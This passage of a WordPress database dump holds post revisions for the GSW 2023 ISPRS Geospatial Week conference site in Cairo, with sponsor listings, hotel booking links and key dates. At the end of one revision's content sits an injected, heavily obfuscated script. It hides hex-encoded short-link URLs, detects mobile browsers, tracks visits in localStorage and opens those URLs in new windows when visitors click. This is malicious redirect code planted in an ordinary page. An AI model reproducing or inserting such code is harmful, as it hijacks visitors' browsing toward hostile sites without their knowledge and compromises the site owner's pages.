accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 22:37:51','2023-06-13 22:37:51','',3066,'https://gsw2023.com/?p=4688',0,'revision','',0),
(4689,1,'2023-06-13 22:39:15','2023-06-13 22:39:15','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:10px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" 